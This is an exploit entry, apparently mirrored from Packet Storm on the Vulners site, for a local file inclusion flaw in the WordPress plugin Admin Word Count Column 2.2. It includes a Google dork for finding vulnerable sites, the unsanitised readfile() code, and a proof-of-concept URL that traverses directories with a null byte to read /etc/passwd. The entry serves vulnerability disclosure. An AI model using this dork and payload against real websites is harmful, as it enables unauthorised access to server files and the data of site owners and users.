Lucene search
K

WordPress Admin Word Count Column 2.2 Local File Inclusion

🗓️ 28 Mar 2022 00:00:00Reported by Hassan Khan YusufzaiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 251 Views

WordPress Admin Word Count Column 2.2 Local File Inclusion vulnerabilit

Code
`# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local  
File Download  
# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/  
# Date: 27-03-2022  
# Exploit Author: Hassan Khan Yusufzai - Splint3r7  
# Vendor Homepage:  
https://wordpress.org/plugins/admin-word-count-column/  
<https://wordpress.org/plugins/video-synchro-pdf/>  
# Version: 2.2  
# Contact me: h [at] spidersilk.com  
  
# PHP version: 5.3.2 or below  
  
# Vulnerable File: plugins/admin-word-count-column/download-csv.php  
  
# Vulnerable Code:  
  
```  
<?php  
date_default_timezone_set('America/Los_Angeles');  
$csvdate = date('Md-H-i-s-T');  
$csvname = 'wordcounts-' . $csvdate . '.csv';  
header('Content-Type: application/csv');  
header('Content-Disposition: attachment; filename=' . $csvname);  
header('Pragma: no-cache');  
readfile($_GET['path'] . 'cpwc.csv');  
?>  
```  
  
# Proof of Concept:  
  
localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0  
  
Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Mar 2022 00:00Current
7.4High risk
Vulners AI Score7.4
251